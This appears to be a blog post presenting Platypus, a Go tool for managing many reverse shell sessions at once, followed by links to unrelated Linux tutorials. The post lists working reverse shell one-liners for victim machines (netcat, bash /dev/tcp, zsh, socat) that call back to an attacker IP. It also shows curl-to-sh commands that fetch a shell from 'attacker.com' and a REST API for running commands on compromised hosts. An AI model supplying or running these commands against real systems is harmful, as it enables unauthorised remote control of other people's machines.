Platypus : A modern Multiple Reverse Shell Sessions Manager Written In Go

Platypus is a modern multiple reverse shell sessions/clients manager via terminal written in go. It include the following

  • Multiple service listening port
  • Multiple client connections
  • RESTful API
  • Reverse shell as a service

Also Read – W12Scan : A Simple Asset Discovery Engine for Cybersecurity

Network Topology

Attack IP: 192.168.1.2
Reverse Shell Service: 0.0.0.0:8080
RESTful Service: 127.0.0.1:9090
Victim IP: 192.168.1.3

Run Platypus from source code

go get github.com/WangYihang/Platypus
cd go/src/github.com/WangYihang/Platypus
go run platypus.go

Run Platypus from release binaries

// Download binary from https://github.com/WangYihang/Platypus/releases
chmod +x ./Platypus_linux_amd64
./Platypus_linux_amd64

Victim side

nc -e /bin/bash 192.168.1.2 8080
bash -c ‘bash -i >/dev/tcp/192.168.1.2/8080 0>&1’
zsh -c ‘zmodload zsh/net/tcp && ztcp 192.168.1.2 8080 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY’
socat exec:’bash -li’,pty,stderr,setsid,sigint,sane tcp:192.168.1.2:8080

Reverse shell as a Service

// Platypus is able to multiplexing the reverse shell listening port
// The port 8080 can receive reverse shell client connection
// Also these is a Reverse shell as a service running on this port

// victim will be redirected to attacker-host attacker-port
// sh -c “$(curl http://host:port/attacker-host/attacker-port)”
curl http://192.168.1.2:8080/attacker.com/1337
bash -c ‘bash -i >/dev/tcp/attacker.com/1337 0>&1’
sh -c “$(curl http://192.168.1.2:8080/attacker.com/1337)”

// if the attacker info not specified, it will use host, port as attacker-host attacker-port
// sh -c “$(curl http://host:port/)”
curl http://192.168.1.2:8080/
curl http://192.168.1.2:8080/192.168.1.2/8080|sh
sh -c “$(curl http://host:port/)”

RESTful API

GET /client List all online clients

curl ‘http://127.0.0.1:9090/client
{
“msg”: [
“192.168.1.3:54798”
],
“status”: true
}
POST /client/:hash execute a command on a specific client
curl -X POST ‘http://127.0.0.1:9090/client/0723c3bed0d0240140e10a6ffd36eed4’ –data ‘cmd=whoami’
{
“status”: true,
“msg”: “root\n”,
}

How to hash?

echo -n “192.168.1.3:54798” | md5sum
0723c3bed0d0240140e10a6ffd36eed4 –

Screenshot

R K

Recent Posts

Understanding the Model Context Protocol (MCP) and How It Works

Introduction to the Model Context Protocol (MCP) The Model Context Protocol (MCP) is an open…

19 hours ago

The file Command – Quickly Identify File Contents in Linux

While file extensions in Linux are optional and often misleading, the file command helps decode what a…

1 day ago

How to Use the touch Command in Linux

The touch command is one of the quickest ways to create new empty files or update timestamps…

1 day ago

How to Search Files and Folders in Linux Using the find Command

Handling large numbers of files is routine for Linux users, and that’s where the find command shines.…

1 day ago

How to Move and Rename Files in Linux with the mv Command

Managing files and directories is foundational for Linux workflows, and the mv (“move”) command makes it easy…

1 day ago

How to Create Directories in Linux with the mkdir Command

Creating directories is one of the earliest skills you'll use on a Linux system. The mkdir (make…

1 day ago